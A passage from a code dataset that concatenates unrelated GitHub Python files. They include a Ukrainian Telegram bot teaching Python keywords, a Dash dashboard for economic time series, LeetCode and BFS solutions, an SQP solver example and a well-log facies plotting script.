вашій' \\\n ' програмі Python. Основний синтаксис використання виглядає так: \\nimport '\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['if'])\ndef if_1(message):\n text = 'Ключове if слово використовується для початку умовного оператора . Інструкція if дозволяє вам написати блок' \\\n ' коду, який буде виконано, лише якщо вираз після if є правдивим. Синтаксис оператора if починається з' \\\n ' ключового слова if на початку рядка, за яким слідує дійсний вираз, значення якого буде оцінено на його' \\\n ' правдивість'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['and'])\ndef and_1(message):\n text = 'Ключове слово Python and використовується, щоб визначити, чи лівий, і правий операнди правдиві чи хибні. ' \\\n 'Якщо обидва операнди правдиві, то результат буде правдивим. Якщо один хибний, то результат буде хибним'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['del'])\ndef del_1(message):\n text = 'del використовується в Python для скасування змінної або імені. Ви можете використовувати його для імен ' \\\n 'змінних, але більш поширеним є видалення індексів зі списку або словника . Щоб скасувати змінну, ' \\\n 'використовуйте, del а потім змінну, яку потрібно скасувати'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['return'])\ndef return_1(message):\n text = 'Ключове слово Python return дійсне лише як частина функції, визначеної за допомогою def. Коли Python' \\\n ' зустрічає це ключове слово, він вийде з функції в цей момент і поверне результати того, що йде після' \\\n ' ключового return слова'\n bot.send_message(message.chat.id, text)\n\n@bot.message_handler(commands=['list'])\ndef list(message):\n bot.send_message(message.chat.id, 'Список текстових команд по html файлам новини Python:' \\\n '\\napril_2022' \\\n '\\napril_2023' \\\n '\\naugust_2022' \\\n '\\nfebruary_2022' \\\n '\\nfebruary_2023' \\\n '\\njanuary_2022' \\\n '\\njanuary_2023' \\\n '\\njuly_2022' \\\n '\\njune_2022' \\\n '\\nmarch_2022' \\\n '\\nmarch_2023' \\\n '\\nmay_2022' \\\n '\\nnovember_2022' \\\n '\\noctober_2022' \\\n '\\nseptember_2022', parse_mode='html')\n\n@bot.message_handler(commands=['time'])\ndef time(message):\n bot.send_message(message.chat.id, 'Список текстових команд часу та дати:' \\\n '\\nдата - Отримати поточну дату' \\\n '\\nчас - Дізнатися поточний час' \\\n '\\nдень тижня - Дізнатися день тижня' \\\n '\\nзалишилось - Розрахувати кількість днів до вказаної дати' \\\n '\\nрозрахувати дату - Розрахувати дату через певну кількість днів' \\\n '\\nгодино дні - Перевести години в дні', parse_mode='html')\n\n@bot.message_handler(content_types=['text'])\ndef get_user_text(message):\n if message.text == 'hello':\n bot.send_message(message.chat.id, 'і тобі привіт')\n elif message.text == 'python':\n bot.send_message(message.chat.id, 'о ти вивчаєш пайтон')\n elif message.text == 'python logo':\n photo = open('python.jpg','rb')\n bot.send_photo(message.chat.id, photo)\n elif message.text == 'cod':\n doc = open('1.docx', 'rb')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'april_2022':\n doc = open('april_2022.html', 'r', encoding='utf-8')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'april_2023':\n doc = open('april_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'august_2022':\n doc = open('august_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'february_2022':\n doc = open('february_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'february_2023':\n doc = open('february_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'january_2022':\n doc = open('january_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'january_2023':\n doc = open('january_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'july_2022':\n doc = open('july_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'june_2022':\n doc = open('june_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'march_2022':\n doc = open('march_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'march_2023':\n doc = open('march_2023.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'may_2022':\n doc = open('may_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'november_2022':\n doc = open('november_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'october_2022':\n doc = open('october_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n elif message.text == 'september_2022':\n doc = open('september_2022.html', 'r')\n bot.send_document(message.chat.id, doc)\n\n\n elif message.text.lower() == 'дата':\n date_now = datetime.date.today()\n bot.send_message(message.chat.id, date_now)\n\n elif message.text.lower() == 'день тижня':\n date_now = datetime.date.today().strftime(\"%A\")\n ukr_day = days_of_week.get(date_now)\n bot.send_message(message.chat.id, ukr_day)\n\n elif message.text.lower() == 'час':\n time_now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n bot.send_message(message.chat.id, time_now)\n\n elif message.text.lower() == 'залишилось':\n bot.send_message(message.chat.id, 'Введіть дату у форматі РРРР-ММ-ДД:')\n bot.register_next_step_handler(message, get_user_date)\n\n elif message.text.lower() == 'розрахувати дату':\n bot.send_message(message.chat.id, 'Введіть кількість днів:')\n bot.register_next_step_handler(message, calculate_date)\n\n elif message.text.lower() == 'годино дні':\n bot.send_message(message.chat.id, 'Введіть кількість годин:')\n bot.register_next_step_handler(message, calculate_date1)\n\n else:\n bot.send_message(message.chat.id, 'Я тебе не розумію')\n\ndef get_user_date(message):\n try:\n user_date = datetime.datetime.strptime(message.text, \"%Y-%m-%d\").date()\n today = datetime.date.today()\n diff = user_date - today\n bot.send_message(message.chat.id, f\"До {user_date} залишилось: {diff.days} днів\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id,\n 'Некоректний формат дати. Введіть ще раз \"залишилось\" і дату у форматі РРРР-ММ-ДД.')\n\ndef calculate_date(message):\n try:\n days = int(message.text)\n today = datetime.date.today()\n calculated_date = today + datetime.timedelta(days=days)\n bot.send_message(message.chat.id, f\"Дата через {days} днів: {calculated_date}\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id, 'Некоректне значення кількості днів. Введіть ціле число.')\n\ndef calculate_date1(message):\n try:\n days = int(message.text)\n calculated_date1 = round(days/24, 2)\n bot.send_message(message.chat.id, f\"{days} годин це: {calculated_date1} днів\", parse_mode='html')\n except ValueError:\n bot.send_message(message.chat.id, 'Некоректне значення кількості днів. Введіть ціле число.')\n\n@bot.message_handler(content_types=['photo'])\ndef get_user_photo(message):\n bot.send_message(message.chat.id, 'Класна фото')\n\nbot.polling(none_stop=True)\n\n","repo_name":"imukha/itStepP33","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15272,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27896368233","text":"# aka symmetry axis / symmetry line\n\n# fyi:\n# https://leetcode.com/problems/line-reflection/solutions/202760/bad-problem-description-come-and-read-what-it-really-means/\n# https://leetcode.com/problems/line-reflection/solutions/3137429/python-o-n-solution-using-dict/\nclass Solution:\n def isReflected(self, points: List[List[int]]) -> bool:\n if not points:\n return True\n\n # count all points\n points_count = collections.defaultdict(int)\n # leftmost/rightmost points\n min_x, max_x = float('inf'), -float('inf')\n for x, y in points:\n # increment it if you'd like to count same coord points as different onesc\n points_count[(x, y)] = 1\n min_x = min(min_x, x)\n max_x = max(max_x, x)\n\n # symmetry line\n mid_x = (min_x + max_x) / 2\n\n # check if points have their mirror points\n for x, y in points:\n # mid - x + mid = 2*mid - x\n mirror_x = 2 * mid_x - x\n mirror_count = points_count.get((mirror_x, y))\n\n if mirror_count is not None:\n if mirror_count > 1:\n points_count[(mirror_x, y)] -= 1\n else:\n del points_count[mirror_x, y]\n\n # if hashmap is empty, all points have proper mirror points\n return not points_count","repo_name":"chlos/exercises_in_futility","sub_path":"leetcode/line_reflection.py","file_name":"line_reflection.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"30380924859","text":"# Try It Yourself Exercise - Pg.146\n# 8-9 Messages\n########################################################################################################################\n# Make a list containing a series of short text messages\n# Pass the list to a function called show_messages(), which prints each text message\n########################################################################################################################\n\ndef show_messages(text_message):\n \"\"\"Shows all text messages within a list.\"\"\"\n for message in text_message:\n print(message)\n\nmessages = [\"Hi, how are you?\", \"Sorry, can't talk now :(\", \"ttyl\", \"ttfn\", \"lol\"]\n\nshow_messages(messages)","repo_name":"BrockAllen-au/Learning_Python","sub_path":"Chapter 8/messages_8-9.py","file_name":"messages_8-9.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4726185217","text":"\"\"\"Controls and vizualisation for 'mini-kep' dataset using Dash/Plotly\n\nScenario:\n\n1. when page is loaded there is a frequency and two indicators selected,\n a plot is drawn\n\n2. select frequency in radio buttons\n -> frequency selection affects list of indicators in drop-down menu 1 and 2\n\n3. select indicator 1 by name in drop-down menu\n -> choosing name affects plot and download footer\n\n4. select indicator 2 by name in drop-down menu\n -> choosing name affects plot and download footer\n\n5. Slider controls source date range and axis range. When changing\n source the Y axis changes as well.\n\nNOT IMPLMENTED:\n\n1. Group selector added before each variable name selector.\n\n2. Position right pane\n\n3. Show latest value \n\n4. Show var and unit description\n\n5. Default vars for frequency\n\n6. More html header\n\"\"\"\n\n\nimport os\nimport flask\nfrom datetime import datetime\nfrom random import randint\n\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\nimport minikep\n\n# Setup from \n# \"... the template is configured to execute 'server' on 'app.py'... \"\nserver = flask.Flask(__name__)\nserver.secret_key = os.environ.get('secret_key', str(randint(0, 1000000)))\napp = dash.Dash(__name__, server=server)\n\n# app properties\napp.css.append_css({\"external_url\": \"https://codepen.io/anon/pen/LONErz.css\"})\napp.title = 'MiniKEP data browser'\n\n\nNAMES = {freq: minikep.names(freq) for freq in 'aqmd'}\n\n\nclass WidgetItems:\n @classmethod\n def names(cls, freq):\n \"\"\"Varibale names by frequency.\"\"\"\n return [{'label': name, 'value': name} for name in NAMES.get(freq)]\n\n @classmethod\n def frequencies(cls):\n return [\n {'label': 'Annual', 'value': 'a'},\n {'label': 'Quarterly', 'value': 'q'},\n {'label': 'Monthly', 'value': 'm'},\n {'label': 'Daily', 'value': 'd'}\n ]\n\n\nclass DataSeries:\n def __init__(self, freq, name):\n self.freq = freq\n self.name = name\n self.data = minikep.datapoints(freq, name)\n\n @staticmethod\n def get_year(datapoint):\n return datetime.strptime(datapoint['date'], \"%Y-%m-%d\").year\n\n def filter(self, start, end):\n def is_in_range(datapoint):\n year = self.get_year(datapoint)\n return year >= start and year <= end\n\n self.data = [d for d in self.data if is_in_range(d)]\n return self\n\n def convert_annual_dates_to_int(self):\n \"\"\"In annual time series plot 1999-12-31 will be plotted around 2000,\n which is misleading, must shift x value to 1999.\"\"\"\n if self.freq == 'a':\n for d in self.data:\n d['date'] = self.get_year(d)\n\n @property\n def dict(self):\n self.convert_annual_dates_to_int()\n return dict(x=[d['date'] for d in self.data],\n y=[d['value'] for d in self.data],\n name=self.name)\n\n\nMIN_YEAR = 1999\nMAX_YEAR = datetime.today().year\n\n\ndef marks(min_year=MIN_YEAR, max_year=MAX_YEAR):\n marks = {i: \"\" for i in range(min_year, max_year)}\n for year in [min_year, 2005, 2010, 2015, max_year]:\n marks[year] = str(year)\n return marks\n\n\n\nHEADER = '''\n# Explore mini-kep dataset\n'''\n\n# Use controls below to select time series frequency and variable names.\n\nFOOTER = '''Links: \n [project home](https://github.com/mini-kep/intro),\n [app code](https://github.com/mini-kep/frontend-dash), \n [dev notes](https://github.com/mini-kep/intro/blob/master/DEV.md), \n [Trello issues](https://trello.com/b/ioHBMwH7/minikep)\n'''\n\nSTART_VALUES = dict(freq='q', name1='GDP_yoy', name2='CPI_rog')\n\nleft_window = html.Div([\n dcc.Markdown(HEADER),\n dcc.RadioItems(\n id='frequency',\n options=WidgetItems.frequencies(),\n value=START_VALUES['freq']\n ),\n dcc.Dropdown(id='name1', value=START_VALUES['name1']),\n dcc.Dropdown(id='name2', value=START_VALUES['name2']),\n html.Div([\n dcc.Graph(id='time-series-graph'),\n dcc.RangeSlider(\n id='view-years',\n count=1,\n step=1,\n min=MIN_YEAR, max=MAX_YEAR,\n marks=marks(),\n value=[MIN_YEAR, MAX_YEAR]\n )\n ], style={'marginBottom': '50'}\n ),\n html.Div(id='download-links'),\n], style={'width': '500'}\n)\n\nright_window = html.Div([\n html.Div(id='var1-info', style={'marginBottom': 25}),\n html.Div(id='var2-info', style={'marginBottom': 25}),\n], style={'marginRight': 75})\n\n\ntr1 = html.Tr([\n html.Td(left_window, style={'verticalAlign': 'top'}),\n html.Td(right_window, style={'verticalAlign': 'top'}),\n ])\n\n# TODO: two extra hr-like lines appear \n\napp.layout = html.Div([\n \n html.Table([tr1]),\n \n html.Div(dcc.Markdown(FOOTER), style={'marginTop': 15}) \n \n ], style={'marginTop': 25, 'marginLeft': 50})\n \n \n# callbacks \n \n# Variable BRENT\n# Frequency: d\n# Start: 1987-05-20\n# End: 2017-10-30\n# Latest value: 60.65\n# Download: \n# Short link: \n\n\ndef make_row(x):\n return html.Tr([html.Td(x[0]), html.Td(x[1])])\n\ndef make_html_table(table_elements):\n return html.Table([make_row(x) for x in table_elements])\n\n# FIXME: freq repeated in two tables\n\ndef short_link(freq, name):\n cu = minikep.CustomAPI(freq, name)\n return html.A(cu.endpoint, href=cu.url)\n\ndef varinfo(freq, name):\n vi = minikep.VarInfo(freq, name)\n table_elements = [\n (html.B('Variable'), html.B(name)),\n ('Description', 'reserved'),\n ('Frequency', freq),\n ('Start', vi.start_date),\n ('Latest date', vi.latest_date),\n # FIMXE in API: shows 'reserved'\n ('Latest value', vi.latest_value),\n #('Download', download_link(freq, name)),\n ('Short link', short_link(freq, name))\n ]\n return make_html_table(table_elements)\n\n\n@app.callback(output=Output('var1-info', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n ])\ndef update_varinfo1(freq, name):\n return varinfo(freq, name)\n\n\n@app.callback(output=Output('var2-info', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name2', component_property='value')\n ])\ndef update_varinfo2(freq, name):\n return varinfo(freq, name)\n\n\n@app.callback(output=Output('name1', component_property='options'),\n inputs=[Input('frequency', component_property='value')])\ndef update_names1(freq):\n return WidgetItems.names(freq)\n\n\n@app.callback(output=Output('name2', component_property='options'),\n inputs=[Input('frequency', component_property='value')])\ndef update_names2(freq):\n return WidgetItems.names(freq)\n\n\ndef xrange(freq, years):\n \"\"\"Updating x axis based on years selection in range slider.\"\"\"\n if freq == 'a':\n start = years[0] - 2\n end = years[1] + 3\n return dict(range=[\"{start}\", \"{end}\"])\n else:\n start = years[0] - 2\n end = years[1] + 2\n return dict(range=[f\"{start}-12-31\", f\"{end}-12-31\"])\n\n\ndef annotation_item(data_dict):\n x, y = get_last(data_dict)\n return dict(xref='x', yref='y',\n x=x, y=y,\n font=dict(color='black'),\n xanchor='left',\n yanchor='middle',\n text=f' {y}',\n showarrow=False)\n\n\ndef get_last(data_dict):\n return data_dict['x'][-1], data_dict['y'][-1]\n\n\n@app.callback(output=Output('time-series-graph', 'figure'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n Input('name2', component_property='value'),\n Input('view-years', component_property='value'),\n ])\ndef update_graph_parameters(freq, name1, name2, years):\n # data\n ts1 = DataSeries(freq, name1).filter(*years).dict\n anno = [annotation_item(ts1)]\n data_list = [ts1]\n if name2:\n ts2 = DataSeries(freq, name2).filter(*years).dict\n data_list.append(ts2)\n anno.append(annotation_item(ts2))\n # layout\n layout_dict = dict(margin={'l': 40, 'r': 0, 't': 20, 'b': 30},\n legend=dict(orientation=\"h\"),\n showlegend=True)\n layout_dict['xaxis'] = xrange(freq, years)\n layout_dict['annotations'] = anno\n return dict(layout=layout_dict, data=data_list)\n\n\ndef download_data_html(freq, names, years):\n link_text = 'Download data in CSV format'\n # FIXME: use years in link\n url = minikep.get_frame_url(freq, names)\n return html.A(link_text, href=url)\n\n\n@app.callback(output=Output('download-links', 'children'),\n inputs=[Input('frequency', component_property='value'),\n Input('name1', component_property='value'),\n Input('name2', component_property='value'),\n Input('view-years', component_property='value'),\n ])\ndef update_link_parameters(freq, name1, name2, years):\n link1 = None\n names = [name for name in (name1, name2) if name] \n if freq and names:\n link1 = download_data_html(freq, names, years)\n return [link1]\n\n\n# app.layout controls HTML layout of dcc components on page:\n# - header and footer markdown blocks\n# - radio items\n# - 2 dropdown menus\n# - graph with time series\n# - slider for timerange\n# - links to download data\n\n\nif __name__ == '__main__':\n port = os.environ.get('DASH_PORT', 8000)\n app.server.run(debug=True, threaded=True, port=int(port))\n","repo_name":"mini-kep/frontend-dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"27881524813","text":"import os\nfrom maya import mel, cmds\nfrom functools import partial\nfrom collections import OrderedDict\n\nbuttons = OrderedDict(\n {\n \"FocalOffsetNode\": {\n \"command\": (\"import FocalOffset\\nFocalOffset.main()\"),\n \"sourceType\": \"python\",\n \"style\": \"iconOnly\",\n \"image\": \"maya_focaloffset_icon.png\",\n \"annotation\": \"Focal Offset Node\",\n \"enableCommandRepeat\": False,\n \"flat\": True,\n \"width\": 32,\n \"height\": 32,\n \"enableBackground\": False,\n },\n }\n)\n\n\ndef create_shelf():\n \"\"\"\n Create the OBB shelf\n\n Raises:\n None\n\n Returns:\n None\n \"\"\"\n\n tab_layout = mel.eval(\"$pytmp=$gShelfTopLevel\")\n shelf_exists = cmds.shelfLayout(\"FocalOffset\", exists=True)\n\n if shelf_exists:\n cmds.deleteUI(\"FocalOffset\", layout=True)\n\n shelf = cmds.shelfLayout(\"FocalOffset\", parent=tab_layout)\n\n for button, kwargs in buttons.items():\n cmds.shelfButton(label=button, parent=shelf, **kwargs)\n\n # Fix object 0 error.\n shelves = cmds.shelfTabLayout(tab_layout, query=True, tabLabelIndex=True)\n\n for index, shelf in enumerate(shelves):\n cmds.optionVar(stringValue=(\"shelfName%d\" % (index + 1), str(shelf)))\n\n\ncreate_shelf()\n","repo_name":"chrisdevito/FocalOffsetNode","sub_path":"scripts/FocalOffset/shelf/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13773303330","text":"from feasible_sqp import *\nimport numpy as nmp\n\nINSTALL_DEPS = 0\nUSE_MATLAB_HSL = 0\n\nif INSTALL_DEPS:\n if USE_MATLAB_HSL: \n install_dependencies(matlab_root_path='/usr/local/MATLAB/R2017b')\n else:\n install_dependencies(\n blas_lib_path='/usr/lib/x86_64-linux-gnu/blas/libblas.so', \\\n lapack_lib_path='/usr/lib/x86_64-linux-gnu/lapack/liblapack.so', \\\n hsl_lib_path='/usr/local/lib/libhsl.so')\n\n# number of primal variables\nnv = 2\n# create solver\nsolver = feasible_sqp(nv, np=1)\n# get primal variables\ny = solver.y\np = solver.p\n\n# define cost\nf = 1.0/2.0*ca.mtimes((y-p).T,y-p)\n# define constraints\ng = ca.vertcat(y[0] + 1.0*ca.sin(y[1]) + 0.5)\n# define bounds\nlby = -0.4*nmp.ones((nv,1))\nuby = 0.7*nmp.ones((nv,1))\n# define nonlinear constraints\nlbg = -0.000*nmp.ones((1,1))\nubg = 0.000*nmp.ones((1,1))\n# define parameters\np0 = 10.0*nmp.ones((1,1))\n# generate solver\nsolver.generate_solver(f,f,g, lby = lby, uby = uby, lbg=lbg, ubg=ubg, p0 = p0)\n# solver.generate_solver(f,f,g, lby = lby, uby = uby)\n\n# solve NLP\nsolver.solve()\ny_bar = solver.get_primal_sol()\nprint('optimal primal solution: ', y_bar)\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\nprint('')\n\n# set params\nsolver.set_param(-10.0*nmp.ones((1,1)))\n# set initial guess\nsolver.set_primal_guess(y_bar)\nsolver.set_dual_guess(lam_bar)\n\n# re-solve NLP\nsolver.solve()\ny_bar = solver.get_primal_sol()\nprint('optimal primal solution: ', y_bar)\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\nprint('')\n\n# set params\nsolver.set_param(10.0*nmp.ones((1,1)))\n# set initial guess\nsolver.set_primal_guess(y_bar)\nsolver.set_dual_guess(lam_bar)\nsolver.solve()\nlam_bar = solver.get_dual_sol()\nprint('optimal dual solution: ', lam_bar)\n\nstats = solver.get_stats()\n","repo_name":"zanellia/feasible_sqp","sub_path":"examples/main_solve.py","file_name":"main_solve.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"20"} +{"seq_id":"2694799346","text":"class Solution:\n def Euclidean(self, points: List[int]):\n x, y = points\n return (x**2 + y**2)**0.5\n \n def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:\n result = []\n sortedLists = []\n \n for point in points:\n heapq.heappush(sortedLists, (self.Euclidean(point), point[0], point[1]))\n \n # print(sortedLists)\n \n# minNum = float('inf') \n# while sortedLists:\n# if minNum < sortedLists[0][0]:\n# break\n \n# tmp = heapq.heappop(sortedLists)\n# result.append(tmp[1])\n# minNum = tmp[0]\n \n for _ in range(k):\n _, x, y = heapq.heappop(sortedLists)\n result.append([x,y])\n \n return result","repo_name":"donghyeon95/algorithms","sub_path":"973-k-closest-points-to-origin/973-k-closest-points-to-origin.py","file_name":"973-k-closest-points-to-origin.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"27528352020","text":"from HashTable import HashTable\n\ndef read_txt_to_matrix(path : str) -> list:\n \"\"\"\n Função de leitura de um arquivo-texto, que salva\n sua informação em uma matriz (lista de listas).\n \"\"\"\n \n return_matrix = list() # O(1)\n with open(path, 'r') as f:\n for line in f.readlines(): # O(l)\n return_matrix.append(list(map(int, line.split(' ')))) # O(c), onde c é o número de colunas\n return return_matrix # O(1)\n # O(1) + O(l)*O(c) + O(1) => O(l)*O(c) => O(n)\n\n\ndef print_matrix(matrix : list) -> None:\n \"\"\"\n Função para imprimir uma matriz na tela\n \"\"\"\n line_len = len(matrix[0]) # O(1) ou O(n) (depende da implementação da função len() e da classe list do Python)\n for line in matrix: # O(l)\n print('[', end='') # O(1)\n\n for idx, num in enumerate(line): # O(c)\n if idx == line_len - 1: # O(1)\n print(f'{num}', end='') # O(1)\n else: # O(1)\n print(f'{num}, ', end='') # O(1)\n \n print(']') # O(1)\n \n # O(n) + O(l)*O(c)*O(1) + O(1) => O(n)\n\n\ndef change_duplicate_on_matrix(matrix : list, hash_table_size : int = 53) -> None:\n \"\"\"\n Função para substituir itens duplicados por 0\n \"\"\"\n original_idxs = dict()\n ht = HashTable(hash_table_size) # O(1) em relação ao tamanho da lista\n # Nota: utilizei um número primo, pois pela minha função de disperção, esses números são preferíveis\n # O tamanho do vetor base pode variar para melhor acomodar o custo do algoritmo\n\n for idx_l, line in enumerate(matrix): # O(l)\n for idx_c, element in enumerate(line): # O(c)\n _, test = ht.has(element)\n if test >= 0: # O(1) no caso médio\n matrix[idx_l][idx_c] = 0\n if matrix[original_idxs[element][0]][original_idxs[element][1]] != 0:\n matrix[original_idxs[element][0]][original_idxs[element][1]] = 0\n ht.add(element) # O(1) no caso médio\n original_idxs[element] = (idx_l, idx_c)\n # O(l)*O(c)*O(1) => O(n) no caso médio\n\n","repo_name":"rabdiego/processo_seletivo_ceos","sub_path":"fase_1/matrizes.py","file_name":"matrizes.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"1460939388","text":"from notebook.base.handlers import IPythonHandler\n\nclass SwanHandler(IPythonHandler):\n\n def get(self):\n \"This method renders the Jobs Page in SWAN Tree view.\"\n\n self.write(self.render_template('gangapage.html',\n\t\t\t\t\tpage_title='Jobs',\n\t\t\t\t\tganga_page='True',\n\t\t\t\t\tterminals_available=self.settings['terminals_available'],\n ))\n","repo_name":"apsknight/gangaextension","sub_path":"extension/gangaextension/serverextension/swanhandler.py","file_name":"swanhandler.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"26715444866","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\n# 거리를 재면서 bfs\ndef bfs(r, c):\n level = 1 # 거리를 level로 표현\n visited = [[0]*N for _ in range(N)]\n\n # delta 상 우 하 좌\n dr = [-1, 0, 1, 0]\n dc = [0, 1, 0, -1]\n\n \n # queue에 시작점 넣어주기\n queue = []\n queue.append([r,c])\n visited[r][c] = 1\n\n\n while queue:\n size = len(queue) \n for _ in range(size): # 현재 level의 길이 만큼만 반복을 돌림\n cur_pos = queue.pop(0)\n for i in range(4): # 4방 탐색\n nr = cur_pos[0] + dr[i]\n nc = cur_pos[1] + dc[i]\n\n if not(0 <= nr < N and 0 <= nc < N): # 범위 밖\n continue\n if maze[nr][nc] == 3: # 도착\n return level\n if visited[nr][nc] == 0 and maze[nr][nc] == 0: # 가는 길\n visited[nr][nc] = 1\n queue.append([nr, nc])\n level += 1\n\n return 0\n\n\n\n\nfor tc in range(1, int(input())+1):\n N = int(input())\n\n maze = [list(map(int, input())) for _ in range(N)]\n \n # 시작 점 찾기\n for i in range(N):\n for j in range(N):\n if maze[i][j] == 2:\n ans = bfs(i,j)\n\n print(\"#{} {}\".format(tc, ans))","repo_name":"alpaka99/algorithm","sub_path":"algorithm_class/5105_미로의 거리/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12002121246","text":"class Solution(object):\n def numIdenticalPairs(self, nums):\n counter=0\n for i in range(len(nums)):\n j=0\n while j 3:\n sun_x = 0\n start = 0\n # End if\n # End if\n #screen.blit(image, (220, 165)) # House\n pygame.display.flip() # flip the display\n clock.tick(180) # tick the clock over\n# End while\n\npygame.quit()\n","repo_name":"JamesonW0/WangJ-Python","sub_path":"PyGame/House of the Rising Sun/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"19266999044","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nlogs = pd.read_csv('Well_Tauk_AfterProcessing.csv')\r\nprint(logs.columns)\r\nprint(\"min\", logs.Depth.min())\r\nprint(\"max\", logs.Depth.max())\r\nprint(\"avg\", logs.DT.mean())\r\n\r\nlogs = logs[(logs.Depth >= 6400) & (logs.Depth <= 6800)]\r\n\r\nsand_cutoff = 0.50\r\nbrine_sand = ((logs.Vshale <= sand_cutoff) & (logs.SW >= 0.9))\r\noil_sand = ((logs.Vshale <= sand_cutoff) & (logs.SW < 0.9))\r\nshale = (logs.Vshale > sand_cutoff)\r\n\r\ntemp_lfc = np.zeros(np.shape(logs.Vshale))\r\ntemp_lfc[brine_sand.values] = 1 # LFC will be 1 when ssb (brine sand flag) is True\r\ntemp_lfc[oil_sand.values] = 2 # LFC will be 2 when sso (oil sand flag) is True\r\ntemp_lfc[shale.values] = 4 # LFC will be 4 when sh (shale flag) is True\r\nlogs['LFC'] = temp_lfc # Copy the temporary log temp_lfc into the DataFrame with name `LFC`\r\n\r\nlogs.to_csv('welltaukfacies_lfc.csv',index=False) # save the data for use in Part 2\r\nprint(np.shape(logs.Vshale))\r\n\r\nstring = \"brine sst={0}, oil sst={1}, shale={2}\"\r\ndata = (np.count_nonzero(brine_sand),\r\n np.count_nonzero(oil_sand),\r\n np.count_nonzero(shale))\r\nprint(string.format(*data))\r\nprint(\"LFC min: {0}, LFC max: {1}\".format(logs.LFC.min(), logs.LFC.max()))\r\n\r\nimport matplotlib.colors as colors\r\n# 0=undef 1=bri 2=oil 3=gas 4=shale\r\nccc = ['#B3B3B3','blue','green','red','#996633',]\r\ncmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed')\r\n\r\nztop = 6400; zbot=6800\r\nll=logs[(logs.Depth>=ztop) & (logs.Depth<=zbot)]\r\n\r\ncluster=np.repeat(np.expand_dims(ll['LFC'].values,1), 100, 1)\r\n\r\nf, ax = plt.subplots(nrows=1, ncols=4, figsize=(8, 12))\r\nax[0].plot(ll.Vshale, ll.Depth, '-g', label='Vsh')\r\nax[0].plot(ll.SW, ll.Depth, '-b', label='Sw')\r\nax[1].plot(ll.PhieTotal, ll.Depth, '-k', label='phi')\r\nax[1].plot(ll.NPHI, ll.Depth, '-', color='0.5')\r\nax[2].plot(ll.Vp0Vs, ll.Depth, '-', color='0.5')\r\nim=ax[3].imshow(cluster, interpolation='none', aspect='auto',cmap=cmap_facies,vmin=0,vmax=4)\r\nax[1].fill_betweenx(ll.Depth, ll.PhieTotal,ll.NPHI , where=(ll.PhieTotal >= ll.NPHI), color='orange')\r\nax[1].fill_betweenx(ll.Depth, ll.PhieTotal, ll.NPHI, where=(ll.PhieTotal <= ll.NPHI), color='blue')\r\ny2 = ll.Vshale\r\ny1 = y2 * 0 + 0.5\r\nax[0].fill_betweenx(ll.Depth, y1, y2, where=(y1 >= y2), color='gold', linewidth=0)\r\nax[0].fill_betweenx(ll.Depth, y1, y2, where=(y1 <= y2), 